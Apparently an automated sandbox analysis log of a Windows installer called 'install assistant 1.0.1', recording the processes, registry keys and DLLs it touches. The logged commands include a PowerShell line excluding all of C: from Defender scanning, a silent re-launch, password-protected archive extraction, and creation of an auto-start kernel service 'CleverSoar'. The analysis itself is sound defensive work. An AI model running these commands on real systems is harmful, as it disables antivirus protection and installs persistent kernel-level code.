Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCA5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,	7_2_6CCA5D60
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00189313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,	11_2_00189313
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00193D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	11_2_00193D66

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 11_2_00189252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,

11_2_00189252

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp

Code function: 7_2_6CCA5240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,

7_2_6CCA5240

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp

File created: C:\Program Files (x86)\Windows NT\is-LHLK8.tmp

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4304:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1644:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1100:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1864:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6512:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1292:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3116:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2472:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3652:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6516:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1680:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4508:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7100:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2604:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2764:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5248:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6480:120:WilError_03

Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe

File created: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp

Jump to behavior

Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe

Virustotal: Detection: 6%

Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe

String found in binary or memory: /LOADINF="filename"

Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe

File read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe	Process created: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp "C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20444,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe"
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe	Process created: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp "C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$5046E,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe	Process created: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp "C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20444,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe	Process created: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp "C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$5046E,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Section loaded: srvcli.dll	Jump to behavior
